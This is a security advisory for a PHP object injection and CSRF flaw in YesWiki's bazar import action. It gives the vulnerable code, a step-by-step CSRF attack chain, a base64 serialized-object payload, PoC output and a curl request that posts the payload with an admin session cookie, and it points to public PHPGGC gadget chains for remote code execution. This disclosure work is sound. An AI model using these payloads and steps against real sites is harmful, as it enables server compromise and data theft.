GHSA-9369-69WJ-7M2F
Vulnerability from github – Published: 2026-07-09 21:02 – Updated: 2026-07-09 21:02Details
Sink
tools/bazar/services/CSVManager.php line 372-399:
public function importEntry(array $importedEntries, string $formId): ?array
{
if (!$this->importdone) {
// ...
foreach ($importedEntries as $entry) {
$entry = unserialize(base64_decode($entry)); // <-- SINK
$entry = array_map('strval', $entry);
// ...
There is no ['allowed_classes' => false] argument; arbitrary classes are instantiated. The subsequent array_map('strval', $entry) additionally exercises __toString on each top-level array element, doubling the magic-method surface available to a gadget chain.
Source
tools/bazar/actions/BazarImportAction.php:
// formatArguments()
'mode' => (isset($_POST['submit_file']) && !empty($_FILES['fileimport']['name'])) ? 'submitfile' :
(isset($_POST['importfiche']) ? 'importentries' : 'default'),
'importentries' => $_POST['importfiche'] ?? null,
// run()
case 'importentries':
// ...
$importedEntries = $this->CSVManager->importEntry($this->arguments['importentries'], $vID['id']);
break;
$_POST['importfiche'] flows directly to the sink. The mode switches to 'importentries' whenever the request body contains the key, so an attacker need only POST importfiche[0]=<payload>.
Reachability
-
The action is registered as
bazarimport. The defaultBazaRpage (setup/sql/default-content.sql->BazaRpage entry, ships with{{bazar showexportbuttons="1"}}) routes?BazaR&vue=importer&id_typeannonce=<N>toBazarAction::run()->case VOIR_IMPORTER -> callAction('bazarimport', ...)(tools/bazar/actions/BazarAction.php:257-258). So the sink is reachable on a default install with no extra page authoring. -
BazarImportAction::run()calls$this->checkSecuredACL()with the default$adminOnly=true. Only wiki admins (or accounts the admin has added to thebazarimportaction ACL) can execute it. -
The
importentriesbranch does NOT invokeCsrfTokenController::checkToken(...). Greppingtools/bazar/actions/BazarImportAction.phpconfirms the action class has nocsrforcheckTokenreference at all. This is asymmetric with sibling actions:tools/bazar/controllers/FormController.phpdoes callcheckToken('main', 'POST', 'confirmDeleteToken')for destructive operations. The import path skips the same protection. -
Therefore the full kill chain for a remote attacker is:
a. Identify any admin user on the target wiki.
b. Deliver an HTML page (email, chat, link) that auto-POSTs importfiche[0]=<base64-encoded PHPGGC payload> to https://<wiki>/?BazaR&vue=importer&id_typeannonce=1.
c. The admin's session cookie is sent automatically; the action passes checkSecuredACL; the unserialize fires.
Gadget chain availability
composer.json requires doctrine/annotations ^1.11 and doctrine/cache ^1.10. Both have published PHPGGC chains (Doctrine/RCE1, Doctrine/FW1, Doctrine/FW2, etc., from https://github.com/ambionics/phpggc). These chains terminate in either system($cmd) (RCE1) or file_put_contents($php_file, $contents) (FW1) entry-points -- both sufficient to give the attacker shell on the YesWiki host.
This advisory does not include a working PHPGGC chain end-to-end (writing a chain that survives YesWiki's exact dependency-resolved class graph is separate work). The PoC demonstrates the primitive (attacker-controlled class instantiation + magic-method execution); the chain is a downstream exercise using public tooling.
Past advisories cross-check
YesWiki's published GitHub advisories cover XSS, SQLi, arbitrary-PHP-file-write RCE, path traversal, and unauthenticated backup download. None covers an unserialize / PHP-object-injection sink, so this is a novel vulnerability class for the project.
PoC
A self-contained PoC reproducing the inner loop is available; it copies the exact two-line sink and proves that attacker-controlled __destruct runs without booting the full application.
Run:
php poc.php
Output (verbatim):
Crafted importfiche[0] payload (form-ready, urlencoded):
YToxOntpOjA7Tzo2OiJHYWRnZXQiOjE6e3M6NjoibWFya2VyIjtzOjIyOiJQV05FRC1GUk9NLVVOU0VSSUFMSVpFIjt9fQ%3D%3D
== before importEntry ==
[Gadget] __destruct fired with marker='PWNED-FROM-UNSERIALIZE'
PHP Fatal error: Uncaught Error: Object of class Gadget could not be converted to string ...
[Gadget] __destruct fired with marker='PWNED-FROM-UNSERIALIZE'
The two [Gadget] __destruct fired lines (one from inside the loop, one from the engine shutdown after the TypeError) confirm that the attacker-defined Gadget::__destruct executed -- with the attacker-supplied marker -- inside the unmodified importEntry code path.
End-to-end against a live YesWiki install:
curl -i -b "yeswiki_session=<admin_cookie>" \
-X POST "https://wiki.example.com/?BazaR&vue=importer&id_typeannonce=1" \
--data-urlencode \
"importfiche[0]=YToxOntpOjA7Tzo2OiJHYWRnZXQiOjE6e3M6NjoibWFya2VyIjtzOjIyOiJQV05FRC1GUk9NLVVOU0VSSUFMSVpFIjt9fQ=="
(replace the payload with a real PHPGGC Doctrine/FW1 or Doctrine/RCE1 output to obtain RCE on the target host).
Impact
- Authenticated wiki admin who lands on attacker-controlled HTML obtains remote code execution on the YesWiki server (via the cross-site forgery path; no admin interaction with the import UI is required).
- An attacker who has already compromised an admin password upgrades from "wiki content management" to "OS shell on the hosting box".
- The compromise survives the wiki layer entirely: the attacker can write web shells, exfiltrate other sites on shared hosting, modify
wakka.config.php, dump the MySQL database, and pivot from there.
Suggested fix
tools/bazar/services/CSVManager.php::importEntry-- pass['allowed_classes' => false]tounserialize, or, better, replace the base64+serialize transport with the JSON transport the current UI already uses (?api/entries/{formId}POST intools/bazar/presentation/javascripts/bazar-import.js). The serialized-PHP transport appears to be an unused legacy path.tools/bazar/actions/BazarImportAction.php-- add aCsrfTokenController::checkToken('main', 'POST', 'csrf-token', false)guard for the'importentries'mode (and any other state-changing modes). The existingtools/bazar/controllers/FormController.phppattern can be lifted directly.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "yeswiki/yeswiki"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.6.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-52777"
],
"database_specific": {
"cwe_ids": [
"CWE-352",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-09T21:02:58Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Details\n\n### Sink\n\n`tools/bazar/services/CSVManager.php` line 372-399:\n\n```\npublic function importEntry(array $importedEntries, string $formId): ?array\n{\n if (!$this-\u003eimportdone) {\n // ...\n foreach ($importedEntries as $entry) {\n $entry = unserialize(base64_decode($entry)); // \u003c-- SINK\n $entry = array_map(\u0027strval\u0027, $entry);\n // ...\n```\n\nThere is no `[\u0027allowed_classes\u0027 =\u003e false]` argument; arbitrary classes are instantiated. The subsequent `array_map(\u0027strval\u0027, $entry)` additionally exercises `__toString` on each top-level array element, doubling the magic-method surface available to a gadget chain.\n\n### Source\n\n`tools/bazar/actions/BazarImportAction.php`:\n\n```\n// formatArguments()\n\u0027mode\u0027 =\u003e (isset($_POST[\u0027submit_file\u0027]) \u0026\u0026 !empty($_FILES[\u0027fileimport\u0027][\u0027name\u0027])) ? \u0027submitfile\u0027 :\n (isset($_POST[\u0027importfiche\u0027]) ? \u0027importentries\u0027 : \u0027default\u0027),\n\u0027importentries\u0027 =\u003e $_POST[\u0027importfiche\u0027] ?? null,\n\n// run()\ncase \u0027importentries\u0027:\n // ...\n $importedEntries = $this-\u003eCSVManager-\u003eimportEntry($this-\u003earguments[\u0027importentries\u0027], $vID[\u0027id\u0027]);\n break;\n```\n\n`$_POST[\u0027importfiche\u0027]` flows directly to the sink. The `mode` switches to `\u0027importentries\u0027` whenever the request body contains the key, so an attacker need only POST `importfiche[0]=\u003cpayload\u003e`.\n\n### Reachability\n\n1. The action is registered as `bazarimport`. The default `BazaR` page (`setup/sql/default-content.sql` -\u003e `BazaR` page entry, ships with `{{bazar showexportbuttons=\"1\"}}`) routes `?BazaR\u0026vue=importer\u0026id_typeannonce=\u003cN\u003e` to `BazarAction::run()` -\u003e `case VOIR_IMPORTER -\u003e callAction(\u0027bazarimport\u0027, ...)` (`tools/bazar/actions/BazarAction.php:257-258`). So the sink is reachable on a default install with no extra page authoring.\n\n2. `BazarImportAction::run()` calls `$this-\u003echeckSecuredACL()` with the default `$adminOnly=true`. Only wiki admins (or accounts the admin has added to the `bazarimport` action ACL) can execute it.\n\n3. The `importentries` branch does NOT invoke `CsrfTokenController::checkToken(...)`. Grepping `tools/bazar/actions/BazarImportAction.php` confirms the action class has no `csrf` or `checkToken` reference at all. This is asymmetric with sibling actions: `tools/bazar/controllers/FormController.php` does call `checkToken(\u0027main\u0027, \u0027POST\u0027, \u0027confirmDeleteToken\u0027)` for destructive operations. The import path skips the same protection.\n\n4. Therefore the full kill chain for a remote attacker is:\n\n a. Identify any admin user on the target wiki.\n b. Deliver an HTML page (email, chat, link) that auto-POSTs `importfiche[0]=\u003cbase64-encoded PHPGGC payload\u003e` to `https://\u003cwiki\u003e/?BazaR\u0026vue=importer\u0026id_typeannonce=1`.\n c. The admin\u0027s session cookie is sent automatically; the action passes `checkSecuredACL`; the unserialize fires.\n\n### Gadget chain availability\n\n`composer.json` requires `doctrine/annotations ^1.11` and `doctrine/cache ^1.10`. Both have published PHPGGC chains (`Doctrine/RCE1`, `Doctrine/FW1`, `Doctrine/FW2`, etc., from https://github.com/ambionics/phpggc). These chains terminate in either `system($cmd)` (RCE1) or `file_put_contents($php_file, $contents)` (FW1) entry-points -- both sufficient to give the attacker shell on the YesWiki host.\n\nThis advisory does not include a working PHPGGC chain end-to-end (writing a chain that survives YesWiki\u0027s exact dependency-resolved class graph is separate work). The PoC demonstrates the primitive (attacker-controlled class instantiation + magic-method execution); the chain is a downstream exercise using public tooling.\n\n### Past advisories cross-check\n\nYesWiki\u0027s published GitHub advisories cover XSS, SQLi, arbitrary-PHP-file-write RCE, path traversal, and unauthenticated backup download. None covers an `unserialize` / PHP-object-injection sink, so this is a novel vulnerability class for the project.\n\n## PoC\n\nA self-contained PoC reproducing the inner loop is available; it copies the exact two-line sink and proves that attacker-controlled `__destruct` runs without booting the full application.\n\nRun:\n\n```\nphp poc.php\n```\n\nOutput (verbatim):\n\n```\nCrafted importfiche[0] payload (form-ready, urlencoded):\nYToxOntpOjA7Tzo2OiJHYWRnZXQiOjE6e3M6NjoibWFya2VyIjtzOjIyOiJQV05FRC1GUk9NLVVOU0VSSUFMSVpFIjt9fQ%3D%3D\n\n== before importEntry ==\n[Gadget] __destruct fired with marker=\u0027PWNED-FROM-UNSERIALIZE\u0027\nPHP Fatal error: Uncaught Error: Object of class Gadget could not be converted to string ...\n[Gadget] __destruct fired with marker=\u0027PWNED-FROM-UNSERIALIZE\u0027\n```\n\nThe two `[Gadget] __destruct fired` lines (one from inside the loop, one from the engine shutdown after the TypeError) confirm that the attacker-defined `Gadget::__destruct` executed -- with the attacker-supplied marker -- inside the unmodified `importEntry` code path.\n\nEnd-to-end against a live YesWiki install:\n\n```\ncurl -i -b \"yeswiki_session=\u003cadmin_cookie\u003e\" \\\n -X POST \"https://wiki.example.com/?BazaR\u0026vue=importer\u0026id_typeannonce=1\" \\\n --data-urlencode \\\n \"importfiche[0]=YToxOntpOjA7Tzo2OiJHYWRnZXQiOjE6e3M6NjoibWFya2VyIjtzOjIyOiJQV05FRC1GUk9NLVVOU0VSSUFMSVpFIjt9fQ==\"\n```\n\n(replace the payload with a real PHPGGC `Doctrine/FW1` or `Doctrine/RCE1` output to obtain RCE on the target host).\n\n## Impact\n\n- Authenticated wiki admin who lands on attacker-controlled HTML obtains remote code execution on the YesWiki server (via the cross-site forgery path; no admin interaction with the import UI is required).\n- An attacker who has already compromised an admin password upgrades from \"wiki content management\" to \"OS shell on the hosting box\".\n- The compromise survives the wiki layer entirely: the attacker can write web shells, exfiltrate other sites on shared hosting, modify `wakka.config.php`, dump the MySQL database, and pivot from there.\n\n## Suggested fix\n\n1. `tools/bazar/services/CSVManager.php::importEntry` -- pass `[\u0027allowed_classes\u0027 =\u003e false]` to `unserialize`, or, better, replace the base64+serialize transport with the JSON transport the current UI already uses (`?api/entries/{formId}` POST in `tools/bazar/presentation/javascripts/bazar-import.js`). The serialized-PHP transport appears to be an unused legacy path.\n2. `tools/bazar/actions/BazarImportAction.php` -- add a `CsrfTokenController::checkToken(\u0027main\u0027, \u0027POST\u0027, \u0027csrf-token\u0027, false)` guard for the `\u0027importentries\u0027` mode (and any other state-changing modes). The existing `tools/bazar/controllers/FormController.php` pattern can be lifted directly.",
"id": "GHSA-9369-69wj-7m2f",
"modified": "2026-07-09T21:02:58Z",
"published": "2026-07-09T21:02:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-9369-69wj-7m2f"
},
{
"type": "WEB",
"url": "https://github.com/YesWiki/yeswiki/commit/8f70a8d6b8befa0e644d03c785701dbbc55b8fd0"
},
{
"type": "PACKAGE",
"url": "https://github.com/YesWiki/yeswiki"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "YesWiki Vulnerable to Authenticated PHP Object Injection in BazarImportAction via unserialize"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.